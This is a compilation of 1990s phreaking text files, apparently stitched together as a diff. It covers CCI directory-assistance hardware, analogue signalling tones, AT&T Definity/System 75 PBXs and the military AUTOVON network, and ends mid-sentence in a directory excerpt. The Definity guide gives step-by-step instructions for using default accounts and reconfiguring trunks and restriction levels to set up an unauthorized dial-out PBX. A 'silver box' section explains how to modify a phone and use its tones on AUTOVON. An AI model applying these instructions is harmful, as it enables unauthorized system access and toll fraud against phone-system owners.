~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The AICC routes messages between the ARC and the TTS. Two units are
required to enhance system reliability. Each pair of AICCs can communicate
with up to 4 CAIS or LAIS subsystems.
The AICCs are similar to the Audio Communications Controllers (ACCs)
in the ARS system, but AICCs use a Bisynchronous Communications Module (BSCM)
instead of a LACIM.
An AICC can be equipped with up to 8 BSCMs, each of which handles one
synchronous communication line to the TTS. The BSCM models selected depend on
the location of the AICC with respect to the CAIS/LAIS sites. Standard SLIMs
(Subscriber Line Interface Modules) are required for communication with the
ARC.
Trunk Time Switch (TTS)
~~~~~~~~~~~~~~~~~~~~~~~
The TTS has two types of components: the Peripheral Modules (PMs) and
the Common Controls (CCs).
The PM contains the printed circuit boards that provide the link
between the end office's ANI trunks and the ARC and between the ONI trunks and
the ACD. The activity of the PM is under direction of the CC
A PM rack contains five types of circuit boards: Multi-frequency
Receivers (MFRs), Analog Line Front Ends (ALFEs), T1 Front Ends (T1FEs),
Peripheral Module Access Controllers (PMACs), and Multi-purpose Peripheral
Devices (MPPDs).
The MFRs translate the intercepted number from multi-frequency tones
to ASCII digits for ANI calls; for ONI calls that come through a trunk
concentrator, the MFRs translate the tones sent by the concentrator to
indicate an ONI call. Based on the tones, the MFR determines the type of
call: regular, trouble, etc.
ALFEs convert incoming analog data to digital form so that it can be
switched on the digital network. They also convert outgoing digital data back
to analog. Incoming ALFEs provide the link between the TTS and the analog
trunks from the Class 5 End Offices. Outgoing ALFEs provide the link between
the TTS and the analog trunks to the ACD.
ALFE is subdivided into two types for both incoming and outgoing:
ALFE-A (contains the control logic, PCM bus termination, and ports for 8
trunks) and ALFE-B (contains ports for 16 trunks, but must be paired with an
ALFE-A in order to use the control logic and PCM bus on the backplane).
ALFE-As can be used without ALFE-Bs, but not vice versa.
Incoming ALFEs support E&M 2-wire, E&M 4-wire, reverse battery, and
3-way signalling trunks. Outgoing ALFEs support E&M 2-wire, reverse battery,
and high-low trunking.
T1FEs provide the links between the TTS and the D3-type T1 spans from
the end offices. They also link the DARU VOCAL board ports and the TTS. Each
board has 24 ports in order to handle a single T1 span which carries 24 voice
channels.
PMAC is based on a Motorola 68000 microprocessor that directs and
coordinates data flow within the PM.
MPPD boards provide bus termination and the system clocks for the
digital network. The MPPD contains a master and a secondary clock, which are
synchronized with the frequency of an incoming T-1 span. The module also
contains its own clock for use when T-1 synchronization is not available or
lost.
The MPPD also generates the ringing tones, busy signals, and reorder
tones heard by the customer and sends the zip (alert) tone to the operator.
The CC controls the interaction between the PM components and the
DARU. It contains the Office Dependent Data Base (ODDB), which is a system
table that describes the configuration of the TTS. The CC uses the ODDB to
determine whether an incoming call is an ANI or ONI trunk.
The CC sets up paths through the digital network in order to
coordinate the resources of the CAIS/LAIS. It receives messages from the
PMAC, stores information necessary for returning a response to the appropriate
trunk, and controls message routing to and from the ARC or the operator. It
also synchronizes the TTS and the Directory Assistance System (DAS) for
operator-caller communications.
The CC is a Power-series standalone processor that contains a central
processing unit (CPU-2), based on the Motorola 68000 microprocessor. The
processor also contains distributed intelligence for controlling the memory
subsystem, the IO (input/output) subsystem, and the disk/tape subsystem. Each
CC includes a Winchester disk drive, a quarter-inch tape drive, and additional
miscellaneous hardware.
DAIS II Audio Response Unit (DARU)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The DARU contains the VOCAL boards that produce automated
announcements, which are compiled from a vocabulary stored in RAM. A
CAIS/LAIS contains 1 to 3 DARUs, each with 48 ports.
If a CAIS/LAIS houses more than one DARU, the units are multi-dropped
together. One DARU is always linked to the ARCs (either directly or by modems
and telephone lines) so that the announcement vocabulary can be downloaded
from the ARCs if necessary.
:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:
Much of the information in this file is copied verbatim from the
instructional booklet sent to me by CCI. Their documentation is extremely
in-depth and well written, and, with some looking over, is easy to
understand. Much of the information in here is confusing with all of the
acronyms used as well as technical terms, but if you cross-reference acronyms
throughout the file, you should be able to see what it stands for. Also, if
you don't understand what something does, just think of it in terms of use by
the telephone company in the context used and you can generally get an idea
of what it does or is used for. I hope you enjoyed this file and continue to
read Phrack Inc. files to learn more about the system we use and experience.
Any constructive suggestions are welcomed directly or indirectly.
Taran King
+257
View File
@@ -0,0 +1,257 @@
Analogue Signalling Systems - An overview by NeonDreamer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Why only analogue? Why not digital? Well let me tell
you now, the number of phreaks who know more than '.' about
digital signalling over ISDN lines is next to nothing. I
don't know much myself, let alone how to exploit it, so I'll
restrict my ramblings to what can realistically be played
with.
Firstly a note on naming conventions. Most of us are
used to dealing with American texts, and we are used to
signalling systems be referred to in terms of their CCITT
code. The UK has their own codes SSAC and SSMF for
describing signalling. For ease of use I'll stick to what
we are familiar with - CCITT conventions. If you need to
know the equivalent UK code refer to the table below.
CCITT UK
4 SSAC4
5 SSAC10/SSMF1
Non CCITT standards will be referred to in the UK style.
OK, before the good days of auto switching and
subscriber trunk dialling (STD) all trunk switching was
performed by operators on Strowger or related equipment.
Inter-exchange signalling was performed by the operators.
Obviously an automatic network needs to perform a
number of functions.
1) It needs to signal the exchange to connect caller A
to recipient B
2) It needs to supervise the call
3) It needs to give caller A feedback (ringing tone /
engaged tone)
4) It needs to bill the call
Signalling data can be transmitted as pulse breaks,
tones or binary. The following methods are still used
today:
1) Level and direction of current (in 2 wire DC
systems)
2) Pulse duration (DC)
3) Pulse combination (DC)
4) AC signal frequency
5) Frequency combination
6) Binary
Signalling across local lines has evolved from two-wire
DC systems - except ringing current and standard tones.
Tones were initially produced electromechanically as
follows:
Ringing tone 133Hz interrupted
Engaged tone 400Hz interrupted
Out of order 400Hz continuous
Ringing current 17Hz ( @ 75V )
Probably what we are all familiar with in the first
instance is called loop disconnect calling. Anyone who ever
used a rotary fone as a kid (and even on crappy payfones
now) will remember the 'click click click' that signalled
the numbers to the exchange. Remember when you first sussed
that the number of clicks indicated the number you had
dialled? Remember when you found out that by tapping the
handset rest you could dial a number without using the dial?
Did you ever wonder how it worked?
For the sake of completeness - here is the answer.
When a fone is off the hook, it allows DC current to flow
through it. When you dial, you interrupt this DC current
at 10 pulses / second (3 pulses for a 3, 10 for a 0 etc.) -
hence the term loop disconnect calling - you dial by
momentarily disrupting a DC current flow, only flowing off
hook. When your call is answered the recipients exchange
reverses the direction of current flow.
Correct dialling using this method is achieved by
disrupting the DC current for 66.7 ms with 33 ms between
pulses indicating the same number, and a >400ms of DC flow
between pulses indicating a different number.
DC signalling is limited distance wise due to the
resistance in copper wires. Consequently due to the
relatively high power requirements other signalling systems
have been developed.
DTMF dialling and electronic exchanges give a greater
signalling speed. The DTMF frequencies used are listed
below :
Digit Frequencies (Hz)
~~~~~ ~~~~~~~~~~~~~~~~
1 697 1209
2 697 1336
3 697 1477
4 770 1209
5 770 1336
6 770 1477
7 852 1209
8 852 1336
9 852 1477
* 941 1209
0 941 1336
# 941 1447
In payfone systems the call charging signal is a 50 Hz
common mode or longitudinal voltage in which both wires of a
two wire pair are driven in phase.
Blimey, we're only just on to analogue signalling. Hang
on and bear with me....
Between network switching centres parallel signalling
is used in the form of AC signals which may be single
frequency (1VF), dual voice frequency (2VF) or
multifrequency (MVF). The system has evolved from SSAC9
(1VF) in the 1950's the identically featured, but
transistorised 1980's version. Part of the adaptation has
been from 2-wire (metallic pair) to a 4-wire system.
SSAC9 uses the 'magic' 2280Hz signal frequency. This was
exploited by phreakers in the good old days and it is
nothing more than a historical curiosity now...
Multifrequency signalling is now the standard. In our
system an out of band signal of 3825Hz is used for
supervisory purposes - and enables continuous supervision.
This is due to a CCITT recommendation (Q351) and is
referred to as R2 signalling. This is the system of
signalling that '3l33t3' phreaks have taken to playing
with...
So here are the signals used :
| ______Direction______
Condition of circuit | Forward Return
---------------------------------------------------
Idle | Tone on Tone on
Seized | off on
Answered | off off
Clear back | off on
Released | on on or off
Blocked | on off
CCITT4 is an end 2 end signalling system using 2VF and
two tones : 2040Hz (from now on read 'x' [binary 0]) and
2400Hz (from now on read 'y' [binary 1]). It is used for
line signalling and interregister signalling (with serial
transmission in binary).
Consequently a 4 element code in binary gives 16
characters. 10 of these are for digits and four are
supervisory. These are given below...
1 2 3 4
1 y y y x
2 y y x y
3 y y x x
4 y x y y
5 y x y x
6 y x x y
7 y x x x
8 x y y y
9 x y y x
0 x y x y
Call operator code 11 x y x x
Call operator code 12 x x y y
Spare code x x y x
Incom. half echo sup. reqd. x x x y
End of pulsing x x x x
Spare y y y y
OK - now each line signal is prefixed with a signal
called 'P' followed by a control element ( x or y ). The
prefix is a combination of both frequencies and the control
element plays its constituent tones consecutively with the
durations as follows :
P = 150 +- 30ms (2040Hz/2400Hz)
x and y = 100 +- 20ms
There are more supervisory signals too which use X and
Y which are 350ms +- 70ms. So signalling in the forward
direction we have :
Terminal seizing PX
Transit seizing PY
Digits Shown in above table (are you
paying *no* attention?)
Clear forward PXX
Forward transfer PYY
and in the backward direction we have :
Proceed to send X
International transit Y
Engaged PX
Answer PY
Acknowledge P
Phew (that's all for CCITT4). To find better
explanations of the operator codes finish reading the next
section (CCITT5) and then go and get some deeper articles on
signalling (2600 have an excellent CCITT5 article - I'll
Xerox a copy for anyone who is interested).
CCITT5 is the system most abused by phreaks. This
system is generally abused over international 'country
direct' lines. 0800 numbers connecting you to a foreign
operator - which gives you the chance to break their trunk,
seize their line and control their system (yeah!). The
definitive guide to BlueBoxing CCITT5 is on my (growing)
list of projects, I have read the rest and will write the
best both technically and practically ;-)
CCITT5 is a 2VF system using 2400Hz / 2600Hz for line
signalling on a link by link basis. Interregister
signalling is 2MF (2 out of 6 frequency type). The 6
frequencies are spaced 200Hz apart from 700Hz to 1700Hz. In
the USA a similar, but not identical, system is used (R-1).
The CCITT5 code is :
Digit Frequencies
1 700Hz 900Hz
2 700 1100
3 900 1100
4 700 1300
5 900 1300
6 1100 1300
7 700 1500
8 900 1500
9 1100 1500
0 1300 1500
The supervisory tones (ie the useful ones!) are:
Prefix digit sequence 1100Hz 1700Hz
End of digit sequence 1500 1700
Operator code 11 700 1700
Operator code 12 900 1700
700 1100
Payfone coin control 1100 1700
700 1700
Final point - there is a modified CCITT5 system
floating around which uses a 2 out of 6 MF signal, but has
two different sets of frequencies for forward and return
signalling. The tones are spaced at 120Hz from 540Hz to
1980Hz.
NeonDreamer '95 (just)
+204
View File
@@ -0,0 +1,204 @@
The Complete Guide to Definity G Series Systems
AKA System 75 - 85
Written by: Scott Simpson
June 18, 1992
Greets to: Invalid Media, The Missing Link, Randy Hacker,
Dark Druid, Nickodemus, Mercury, Renegade, Infinity (enjoy the army!),
Weirdo, TomCat, GarbageHeap, Dark Shadow and The M&M boys for their ToneLoc.
I am accepting new users on my bbs, leave mail on Unphamiliar
Territory if you wish to call! My board is 14.4k, and has over 250k of
files, and texts.
Basic History
-------------
Definity model systems became in existent in the later part of the 1970's.
In 1983 AT&T came out with a revised model called 75. This system was
built to hold more incoming lines, and did not have as many errors as the
earlier version did. The 1983 version was replaced with a version
re-written in 1986. Today the systems are referred to as G models.
System 75 is now called G1 and 85 is called G2. A new model is currently
available and is called the Definity G3I wich is Generic 3 w/ Intel chip,
and Definity G3R which is Generic 3 w/ Risk chip. There are 3 different
versions to each model. Version one is the most common, and it is a
XE Single Carrier Unit. The other two version I forgot. A system will
usually cost somewhere around 50 to 80 thousand dollars. You MIGHT come
across a smaller version and it is called 'Merlin Legend' this system will
hold about 50-100 lines. System 75 & 85 will hold around 1000 lines.
Enough history!!!
Discovering the System
----------------------
When you find a system 75 or so, you will make a 1200/NONE connection,
as for most setups have a built in 1200 baud modem. Normally the carrier
number will not be in the same prefix as the business or the pbx. And the
line is actually owned by at&t. Try CNA'ing a system 75 line, it will tell
you that it is owned by att. Once you find a carrier, you will need to be
able to display ANSI or some equivelent type of terminal graphics. I
prefer ansi over strip 7+. My suggestion is to use ToneLoc which is
produced by Mucho Maas, and Minor Threat. As you know this file will scan
for for carriers aswell as tones. This file can be found on just about
every ELITE H/P bbs.
Getting into the System
-----------------------
Getting into the system is the easy part if you have the defaults. I will
not give out any defaults, you must find them on your own, and you will
find out that alot of people are not willing to trade for them. The one
account I will give is BROWSE PW:??????. This default will enable you to
snoop around and tell whether or not they have a pbx, providing they have
not changed the password or restricted the account. Browse is usually
a full operational account without the privledges of altering any data.
But I have come across a couple of systems where browse wouldnt do anything.
Using the browse account is a good way to start. It is also good to use
anytime you call and dont plan on changing anything. All actions by browse
are not kept in the system history file. Now on to the actual commands.
Using System 75
---------------
After logging on to 75, there are several accounts available depending
on the default you are using. This part will e for the basics and the
people using browse. I will explain more next for the more advanced people.
When you logon you will have the commands: LIST, DISPLAY and a couple others
that dont matter. These are the only ones that you will need with browse.
First type 'DIS REM' (display remote access). If there is a pbx set on the
system, it will be shown on the extension line. The barrier code is the
code to the dialup. The extension lie can either be 3 or 4 digits. Usually
if its 3 digits, it is run off of AUDIX (automated directory exchange) or
are smart and are hidding the last digit! Next display the trunk groups,
this will tell you the actual dialups; normally. If they are not, dont
panic. As you go thru the trunk groups, look also at the incoming
destination aswell as the night destination. If any of these show the
remote extension here, there is your pbx. If doesnt, keep looking thru all
of the trunk groups. Write down all of the phone numbers it gives you, and
try them. They will usually be found on page three or so.
Alot of the time, places call forward a back line or so to the
actual pbx. If there is no remote access extension when you display the
remote access, then you are shit out of luck unless you have a higher
default and read the rest of this text.
Setting Up Your Own PBX
-----------------------
If you have a higher default, you will notice if you type help you have
more commands that are available to you, such as: change, download, etc...
Remember, the company can change the privledges of the defaults, so if you
can not see these commands, use another default. The first thing you want
to do is display the dialplan, this will tell you the amount of digits and
the first digit of all of the sequences. ie...
Number of Digits
-------1----2----3----4----5----6----7----8----9
--
F 1
I 2 Tac
R 3
S 4 Fac
T 5
6 Extension
D 7 Extension
I 8 Tac
G 9
I 0
T *
#
All extension will start with either a 6 or 7 and be four digits long. The
Tac is two digits, and will start with a 2 or 8. Dont worry about FAC or
any others. After you make notes of this, type 'ch rem' (change remote) and
goto the extension line, and put in an extension. Next find the trunk group
that you want to use, and type 'ch tru #' goto the line for night service
and put the extension in there. If there is already an extension for night
service on all of the trunks dont fear, KEEP READING. If not, add it, and
then save it. If it says invalid extension, you misread the dialplan. If
you pick an extension already in use, it will tell you that when you try to
install it in the remote extension line in the remote address. Once all of
this is completed, you may go back to the remote access, and add a code if
you like. NEXT IS VERY IMPORTANT.. Look at the trunk that you installed
night service. Write down the COR number. Cancle that command, and type
'dis cor #'. Make sure that the Facilities Restriction level.
(FRL) at the top is set to
7!!!! and under calling party restrictions & called party restrictions the
word NONE (lower case) is there! If they are not type 'ch cor #' and do all
of it. Last, type 'dis feature' this will display the feature access
codes for the system. There will be a line that says something like SMDR
Access Code. This will be the code that you enter after the barrier code,
if there is one. I have seen some be like *6 etc...
Also there will be on page 2 I think something to the like outside call,
usually it is set to 9, but be sure.
Thats about it for this segment. All should be fine at this point,
for those that want a 24 hour pbx, this next section is for you.
For those of you that are greedy, and want a 24 hour pbx, most of the
steps above are the same. The only difference is that you will look through
all of the trunks until you come across one that has several incoming rotory
lines in it, simply write down the port number, and the phone number for
future reference, and delete it by using the ch command. From the main
prompt type 'add tru #', dont change anything! For the TAC enter a correct
tac number. Keep going to you get till the COR, enter a valid one, and
remember that the FRL should be set to 7 etc... keep going, the next line
that is vacant and needs something is the incoming destination set it to
remote extension that you have created. The next vacant line i think is
type, towards the middle of the page. Enter ground, and it should print out
ground-start. Hmm, next goto page 3 and enter the port and phone number
that you wrote down earlier. Save all of the changes that you have made.
This should be all you need. In part, if there is a demand, I will tell
how to make a bridge off of a 75. It is alot more diffucult, and am not
going to sit here and type if no one is interested. Also in part 2, i will
discuss how to add a vmb to their system for your own use! Remember, if
they have AUDIX Voice Mail, THEY HAVE a system 75 so happy hunting, and
see ya soon.
If you need to get ahold of me, I call The Million Dollar Saloon,
Unphamiliar Territory. Just leave mail there, and I will reply as soon
as possible.
Scott Simpson
06/22/1992
Basic Terminology
-----------------
COR - Class Of Restriction
FRL - Facilities Restriction Level
SMDR - Station Message Detail Recording
TAC - Trunk Access Code
FAC - Feature Access Code
Basic Commands for Default Emulation (513)
------------------------------------------
Esc Ow - Cancel
Esc [U - Next Page
Esc SB - Save
Esc Om - Help
Commands for 4410
-----------------
Esc Op - Cancel
Esc Ot - Help
Esc Ov - Next Page
Esc Ow - Back Page
Esc OR - Save
Esc Oq - Refresh
Esc Os - Clear Fields
+95
View File
@@ -0,0 +1,95 @@
-------------------------------------
Intro to Automatic Voice Network
Commonly know as AUTOVON
Part I
-------------------------------------
AUTOVON is the Military Voice Communications System. Each Military
Installation has it's own prefix for use in the AUTOVON system. Not all
telephones on military installation have the capability to call another
military installation via AUTOVON. However, they can all receive an AUTOVON
call coming from another installation.
A different 3-number prefix is used when dialing a military base using AUTOVON
than the prefix used when dialing through the civilian phone system. Usually,
AUTOVON is accessed by dialing 8 or 88 and waiting for a dial tone(on any phone
connected to the AUTOVON system). A phone call made in this manner is limited
to "ROUTINE" Priority.
There are "ROUTINE","IMMEDIATE", "FLASH", and "FLASH OVERRIDE" priorities, with
ROUTINE being the lowest and FLASH OVERRIDE the highest To dial higher priority
phone calls than routine, access to Technical control equipment is normally
needed.
Calling AUTOVON exchanges might (most likely will) need a small phone
modification. This modification is known as a "SILVER BOX".
-------------------------------------
Warning: This modification could permanently damage you phone!! Read
information carefully!!!
Unscrew the two large screws on the base of your phone. Take cover off and
place it and the screws in a safe place. Loosen (but don't remove) the screws
on the sides of the touch tone keypad (These are on the sides, and attach it to
its mounting brackets). Now, CAREFULLY remove the pad from its brackets (be
sure not to trip any wires!!) You will notice a plastic cover on the pad.
Separate the two halves and put them out of your way... Be sure not to destroy
them!!!! Now, turn over the pad. You should see a mass of wires, gold plated
contacts( yea, it's real gold!), discrete components, and two fairly large
black, hmmm, things! These are the coils that generate the frequencies. Only
one is used for standard, so all the coils are capable of generating all 4
primary tones (only connections to 3 of the 4 are given, though...). Your
about to make your connection to the fourth, and make the third column of keys
"bank switched" between normal and fourth row. Now, cut three lengths of wire
of different colors about 2 feet long. Look at the coil on the left (with the
5 solder contacts facing you) and solder a wire to the to the 4th post from the
left. This is the 1633 Hz output. Solder the other end of this wire to the
left pole of the smallest SPDT switch you can find. This is the point of no
return now!!!!..Take a look at the bottom edge of the keypad. You should see a
row of 3 gold plated contacts. Look at the one on the left. This controls the
rightmost bank of keys. GENTLY separate the two touching connectors (they are
soldered together with a drop of solder with) and spread them apart. Solder a
colored wire to the top contact, and solder it to the RIGHT pole of the SPDT.
Now, take another colored wire (different color) and solder it to the bottom
(closest) contact. Solder the other end of this to the CENTER pole of the
SPDT.
You have now completed the mods on your phone!!! Congrats!!! When the switch
is in one position you'll get normal tones, in the other you'll get 1633 tones.
-------------------------------------
Now, you're at the part that you have been waiting for!! Testing!! Call
Directory Assistance using normal tones xxx-555-1212. Now, quickly switch to
1633, and press down the [#] key. You will now get a dial tone. You can then
switch back to normal, and try dialing different numbers. The two most
interesting are 6 and 7. These often form a loop-around type connection, and
two people can call in, one using 6 and one using 7, and talk in this matter...
Happy Phreaking you bad boys!!
ShAdOwRuNnEr
Wait for Phile #4, posting some of the AUTOVON exchanges no.'s
Watch phor it!!!!!!
____ __ __ __ ______
/ __ \ / / / / / / / ____/
/ / / / / / / / / / / /
/ /_/ / / / / / / / / /__
/ ____/ / / / / / / / ___/
/ / / /_/ /_/ / / /____
/_/hree \___/\___/orld /______/lite
(916) 689-6241
24 Hours/7 Days
SysOp: Dark Creaper
Co-Sysop: ShAdOwRuNnEr
DOWNLOADED FROM P-80 SYSTEMS.....

+421
View File
@@ -0,0 +1,421 @@
[Excerpt from an Global AUTOVON Telephone Directory as found in a Fort
Lauderdale library... this information is likely getting dated with
technological advance, but should prove to be interesting history.
Even if all the terms are not self-explained the overall content
should be of interest to telecom enthusiasts.]
AUTOmatic VOice Network (AUTOVON)
I. BRIEF DESCRIPTION OF THE AUTOVON
A. The Global AUTOVON is the principal long-haul, nonsecure, common
user voice communications network for the Department of Defense (DoD).
It provides worldwide direct distance dialing station to station service
through a system of government owned and leased automatic switching and
transmission facilities.
B. At present, the AUTOVON spans the earth from Asia to the Middle East,
and from Alaska to Panama. The AUTOVON has approximately 18,000 subscribers
(direct access to the network). The number of users of the network (those
who must dial an access code or go through an operator to obtain AUTOVON
service) far exceed the number of subscribers. Calls on the network average
about 1.1 million attempts daily with an average call length of 3 to 5
minutes.
C. AUTOVON is a major and integral part of the Defense Communications
System (DCS). It is comprised of all DoD nontactical long-haul
point-to-point communications facilities and personnel. It is the
non-secure common user switched voice network of the DCS.
D. The AUTOVON's primary mission is to provide rapid, world-wide command
and control communications for the National Command Authority (NCA)
and other high priority subscribers. Its secondary mission is to provide
an acceptable grade of service for operational, intelligence, logistic,
administrative, and diplomatic users.
II. NATIONAL COMMUNICATIONS SYSTEM VOICE PRECEDENCE SYSTEM
A. The National Communications System (NCS) voice precedence system,
established by NCS Memorandum 1-70 dated 14 February 1970, is directed
for use by all authorized users of the voice communications facilities
in the DoD. Since the effectiveness of the system depends on the
cooperation of the people authorized to employ it, users must (1) be
familiar with the purpose of each precedence category and the type of
call that is assigned the precedence, and (2) exercise care not to
request or use a precedence higher than required.
B. The NCS voice precedence system does not make provisions for
conducting test and exercise calls. Those activities or individuals
authorized or required to conduct such test or exercise calls will
employ a precedence consistent with the nature of the test or exercise.
When the originator of the test or exercise call has contacted the called
party, the call will immediately be identified as a "FLASH, IMMEDIATE, or
PRIORITY test or exercise."
C. Calls of a given precedence will not normally preempt calls of an
equal precedence. However, calls originated by the President of the
United States, Secretary of Defense and Joint Chiefs of Staff can
preempt FLASH calls in progress by application of their FLASH OVERRIDE
capability. In addition, Commanders of unified and specified commands,
when declaring either Defense Condition One (DEFCON ONE) or Air Defense
Emergency, may preempt FLASH calls in progress by application of the
FLASH OVERRIDE capability.
D. The examples listed below should aid the caller in determining what
precedence to use. These examples are in accordance with the NCS voice
precedence system, but are not to be used exclusively for determination
of the precedence of a call. This should be at the discretion of the
originator of the call.
1. FLASH OVERRIDE It should be noted that FLASH OVERRIDE is a capability
and is not considered a level of precedence. Exercising this capability
preempts calls in "ALL" levels of precedence. FLASH OVERRIDE calls will be
handled as fast as humanly possible. The FLASH OVERRIDE capacility is
available to the following:
(a) The President of the United States of America
(b) The Secretary of Defense and Joint Chiefs of Staff.
(c) Commanders of unified and specified commands declaring either
Defense Condition One (DEFCON ONE) or Defense Emergency.
(d) CINCNORAD when declaring either DEFCON ONE or Air Defence Emergency.
2. FLASH Flash calls preempt IMMEDIATE, PRIORITY, and ROUTINE calls and
will be handled as fast as humanly possible. Listed below are examples
of FLASH calls:
(a) Calls pertaining to command and control of military forces essential
to defense and retaliation.
(b) Critical intelligence essential to National survival.
(c) Conduct of diplomatic negotiations critical to arresting or
limiting hostilities.
(d) Dissemination of critical civil alert information essential to
National survival.
(e) Continuity of Federal Government functions essential to National
survival.
(f) Fulfillment of critical United States internal security functions
essential to National survival.
(g) Catastrophic events of National or International significance.
C. IMMEDIATE Immediate calls preempt PRIORITY and ROUTINE calls and are
reserved for communications pertaining to situations which GRAVELY affect
the security of Natioanl and Allied forces. These calls will be handled
as fast as possible. Listed below are some exampled of IMMEDIATE calls:
(a) Reconstitution of forces in a post attack period.
(b) Intelligence essential to National Security.
(c) Conduct of diplomatic negotiations to reduce or limit the
threat of war.
(d) Implementation of Federal Government actions essential to
National survival.
(e) Situations which gravely affect the internal security of
the United States.
(f) Civil Defense actions concerning direction of our population
and their survival.
(g) Disaster or events serious enough to have an immediate and
detrimental effect on the welfare of the population.
(h) Vital information having an immediate effect on aircraft,
spacecraft or missile operations.
(i) Distress assistance.
3. PRIORITY Priority calls preempt ROUTINE calls and are reserved for
communications requiring expeditious action by called parties furnishing
essential information for conducting government operations.
4. ROUTINE This precedence applies to official Government communications
which require rapid transmission by telephonic means but do not require
preferential handling. A ROUTINE call does not preempt any other call
and is handled sequentially as placed by the calling party.
III. WHAT CATEGORY OF NETWORK CUSTOMER ARE YOU?
A. You are an AUTOVON SUBSCRIBER if you can make a call on your phone
without going through a local operator ot DO NOT dial a special access
number. This type of telephone is installed for command & control and
other specific operational purposes. More technically, any individual,
post, station or location directly connected to an AUTOVON switching
center is a subscriber. This means a post switchboard connected to the
AUTOVON is also considered a subscriber. Most people who make AUTOVON
telephone calls DO NOT fall into this category. The majority are
AUTOVON users.
B. You are an AUTOVON USER if you dial a special access number before
you can make an AUTOVON call or if an operator must place the AUTOVON
call for you. This distinction between user and subscriber is made
because there are differences in calling capabilities and instructions
found later in this directory.
IV. WHO IS LISTED IN THE GLOBAL AUTOVON DIRECTORY?
A. SUBSCRIBERS are usually the only listing in this directory. If you are
a subscriber and desire to be listed or if you are listed and do not want
to be listed, forward requests to DCA Code B522 Washington, D.C. 20305-2000.
B. USERS are not normally listed in the Global AUTOVON Telephone Directory.
However, the following are exceptions:
1. If a user is served by a switch which has network in/out dial
(NIOD) and is not manned 24 hours a day, calling parties must have a
point of contact when the switch is unattended. Attended nonduty hour
numbers may be listed in addition to the switch number.
2. If a user is an installation which has an individual information
operator number in addition to the assistance operator number, that
information number will be listed.
C. Requests for user listings should be directed in writing to the user's
serving communications facility for consideration by the Telecommunications
Certification Office (TCO). Amplifying information on AUTOVON directory
listings can be found in DCA Circular 310-V55-6.
V. GLOBAL AUTOVON TELEPHONE DIRECTORY DISTRIBUTION
A. It is not practical to publish a Global AUTOVON Directory and provide a
listing of all commands, activities and agencies that have the capability
to access the network. It follows that distributing the directory to all
commands, activities and agencies with the capability to access the system
is costly. Yet, the directory needs the widest possible distribution to be
effective. This problem is recogniized and distribution of the directory is
made to all subscribers either directly or indirectly via major commands and
agencies world wide. All users may purchase the directory from the Government
Printing Office (GPO). If a directory is unavailable, an alternate method to
obtain AUTOVON numbers is to consult your local operator.
B. Publishers of local directories are encouraged to include excerpts
from this directory and locally tailored AUTOVON number lists in their
directories.
C. If you are on the DCA distribution list for this directory and your
address is incorrect, notify DCA, Code B522, Washington, DC, 20305-2000,
using the correction page in this book.
VI. NETWORK RECORDINGS AND SIGNAL TONES
A. Various tones and recorded announcements tell you about the progress
or disposition of your call:
1. When you hear a DIAL TONE, the network is ready for your call. Dial
your number.
2. When you hear a RINGING TONE, your called number is ringing. Wait for
your party to answer. On routine calls, you should hear a normal ringing
tone (10 rings per minute). On calls of higher precedence, you will hear
a very fast ringing tone (30 rings per minute).
3. When you hear a BUSY TONE, your called number is busy. Try again later.
If you hear the busy tone and your called number is not in use then local
or network equipment is busy. Sometimes there is an equipment irregularity.
Try again later.
4. When you hear a PREEMPT TONE, your call was cut off by a higher
precedence call. Hang up. Wait for a moment in case the call is for you.
If the preempted call requires completion, custom dictates that whomever
placed the original call should reestablish it.
5. When you hear a WARBLE TONE, answer your phone and standby for a
conference call or instructions.
USE OF AUTOVON
CONSTITUTES CONSENT TO
COMMUNICATIONS SECURITY MONITORING
B. Below are some of the recorded announcements you might hear while
using the AUTOVON. These announcements should be noted and reported
according to procedures outlined in para XV Telephone Trouble Reporting,
if trouble is suspected.
1. "Your call cannot be completed as dialed. Please consult your directory
and call again or ask your operator for assistance. This is a recording
(pause) SSB number ____."
2. "The precedence used is not authorized for your line. Please use an
authorized precedence or ask your operator for assistance. This is a
recording (pause) SSB number ____."
3. "Equal or higher precedence calls have prevented completion of your
call or the number you have dialled is not equipped for preemption. This
is a recording (pause) SSB number ____."
4. "AUTOVON service disruption has prevented the completion of your
call. Please wait 30 minutes and try again. In case of an emergency,
call your operator. This is a recording (pause) SSB number ____."
VII. CONFERENCE CALLS
A. Dial one of the following numbers and tell the operator you wish to
make a conference call:
CONUS Alaska OVERSEAS
1. Subscribers dial 0 0 550-1411
2. Users dial 0 0 0
VIII. CALLS TO COMMERCIAL NUMBERS
Official long-distance calls should be placed using a combination of
AUTOVON and local base switchboard lines where possible. You can use
this procedure if the called base switchboard is permitted by the
commander to connect incoming AUTOVON calls to a commercial number and
the called commercial number is within the toll free radius of the
switchboard. OFF-NET extensions will not be completed unless adequate
call supervision is installed.
IX. CALL ASSISTANCE
AUTOVON Assistance Operators (AAO) are available to assist subscribers
when needed. If you are having trouble completing a call, dial "0" to
reach the AAO.
X. SUBSCRIBER PROVIDED EQUIPMENT
The terminal equipment provided by the subscriber for connection to
an AUTOVON switching center must meet the technical interface criteria
outlined in DCA Circular 310-V175-6, System Interface Criteria.
XI. NEW OR ADDITIONAL SERVICE
In order to obtain a new AUTOVON service or to change the type of service
you now have, consult DCA Circular 310-130-1, Submission of Telecommunications
Service Requests.
XII. GLOBAL AUTOVON CALLING
A. The AUTOVON telephone network provides global telephone service for
the DCS. Some subscribers can call everywhere while others are limited
to one particular area or combination of areas. Where you can call depends
on your mission and whether your telephone line is equipped accordingly.
If your calling area is limited, you will not be able to dial outside of
your limit. The directory indicates calling areas and codes. The area code
need not be dialed for calls within the area. Calls to an area outside
the boundary require an area code plus the seven digit AUTOVON number.
If you are transmitting data, alternate area codes are used. Voice and
Data area codes are listed on the first page of eacg geographical listing.
(NOTE: All CONUS and Alaska subscribers can make respective inter-area
calls by following the above procedures.)
B. Secure calls via an AUTOSEVOCOM telephone will be made in accordance
with instructions in the AUTOSEVOCOM Telephone Directory.
XIII. CALLING PROCEDURES
A. VOICE TELEPHONE CALLS: Listen for the dial tone, depress the appropriate
precedence button if the call is to be higher than routine, and dial the
AUTOVON number as outlined above under global AUTOVON calling.
B. DATA TELEPHONE CALLS: Data telephones and associated data equipment
